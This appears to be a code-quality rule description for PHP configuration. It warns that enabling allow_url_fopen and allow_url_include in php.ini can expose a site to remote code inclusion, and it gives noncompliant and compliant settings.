allow_url_fopen
and allow_url_include
allow code to be read into a script from URL’s. The ability to suck in executable
code from outside your site, coupled with imperfect input cleansing could lay your site bare to attackers. Even if your input filtering is perfect
today, are you prepared to bet your site that it will always be perfect in the future?
This rule raises an issue when either property is explicitly enabled in php.ini and when allow_url_fopen
, which defaults to
enabled, is not explicitly disabled.
Noncompliant Code Example
; php.ini Noncompliant; allow_url_fopen not explicitly disabled
allow_url_include=1 ; Noncompliant
Compliant Solution
; php.ini
allow_url_fopen=0
allow_url_include=0
See